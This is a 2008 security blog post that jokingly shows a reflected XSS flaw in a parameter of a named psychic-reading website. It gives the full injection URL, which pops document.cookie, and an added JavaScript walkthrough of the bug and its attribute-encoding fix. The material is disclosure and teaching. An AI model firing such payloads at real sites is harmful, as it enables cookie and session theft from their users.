Tuesday, September 02, 2008

XSS fortune cookie

Forgive me in advance for an extremely bad joke, if you can even call it that, but I just can't help it.
Here's how to get an XSS fortune cookie:

1) Ask the mighty Google oracle who might be able to tell you your fortune.
http://www.google.com/search?hl=en&q=tell+my+fortune&btnG=Search&lr=lang_en

2) Select one of the sponsored links; in this case I chose SpiritualExperts.com.

3) Pick a variable. I settled on banid.

4) Ask it if it has a cookie for you.
http://www.spiritualexperts.com/psychic_reading/psychic_reading.asp?banid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E

Voila...an XSS fortune cookie. Sorry. Really, I am.
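The payload above only works because the page drops the raw banid value into a double-quoted HTML attribute, so the leading `">` closes the attribute and the tag, and the `<SCRIPT>` that follows lands in the document body. The following is an added example, not code from the original post or from the site's own ASP source (which was never published): it assumes a hypothetical `<input value="...">` template for the reflection, uses a constructed example.com URL carrying the same payload, and shows the unencoded rendering beside one that attribute-encodes the value first, plus a small check a defender can run over rendered output.

```javascript
// Added example (not from the original post). Assumed: the page echoed the
// banid query parameter into a double-quoted attribute of a hidden input.
// The URL below is constructed; only the payload string comes from the post.
const SAMPLE_URL =
  'http://example.com/psychic_reading.asp?banid=' +
  '%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E';

// Extract banid exactly as a server-side framework would hand it to the page:
// percent-decoded, so %22 becomes a literal double quote.
function extractBanid(url) {
  return new URL(url).searchParams.get('banid');
}

// Encode the characters that can terminate or alter an attribute value.
// '&' goes first so entities produced by the later steps are not re-encoded.
function htmlAttrEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Inverse of htmlAttrEncode, used only to show the safe form round-trips.
function htmlAttrDecode(value) {
  return String(value)
    .replace(/&gt;/g, '>')
    .replace(/&lt;/g, '<')
    .replace(/&#39;/g, "'")
    .replace(/&quot;/g, '"')
    .replace(/&amp;/g, '&');
}

// Hypothetical vulnerable rendering: raw query value interpolated into markup.
function renderBannerVulnerable(banid) {
  return `<input type="hidden" name="banid" value="${banid}">`;
}

// Hardened rendering: identical template, value encoded for attribute context.
function renderBannerSafe(banid) {
  return `<input type="hidden" name="banid" value="${htmlAttrEncode(banid)}">`;
}

// Defender-side check: did a <script ...> tag appear in the rendered output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// What a browser would see as the attribute value: text up to the next quote.
function attributeValue(html) {
  const m = /value="([^"]*)"/.exec(html);
  return m ? m[1] : null;
}

// Stand-alone demo.
const payload = extractBanid(SAMPLE_URL);
console.log('decoded banid :', payload);
console.log('vulnerable    :', renderBannerVulnerable(payload));
console.log('  script tag? ', containsScriptTag(renderBannerVulnerable(payload)));
console.log('hardened      :', renderBannerSafe(payload));
console.log('  script tag? ', containsScriptTag(renderBannerSafe(payload)));
console.log('  attr value  :', htmlAttrDecode(attributeValue(renderBannerSafe(payload))));
```

In the vulnerable rendering the attribute ends at the injected quote, so `attributeValue` returns an empty string and the script tag sits in the body; in the hardened rendering the whole payload stays inside the attribute and decodes back to the original text, which is the behaviour the fix for this class of bug should preserve.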

The webmaster has been advised...play nice.

Screenshot for after they fix the issue.




4 comments:

Anonymous said...

Hopefully your day job will keep you employed long enough that you won't need to fall back on stand up comedy.

Kevin Lam (Impacta LLC) said...

For sure you're working too hard at your day job to have to resort to this! :) Funny stuff man!

Kevin
Impacta LLC

Rafal Los said...

Dude... you need a vacation.

Sultan said...
This comment has been removed by a blog administrator.
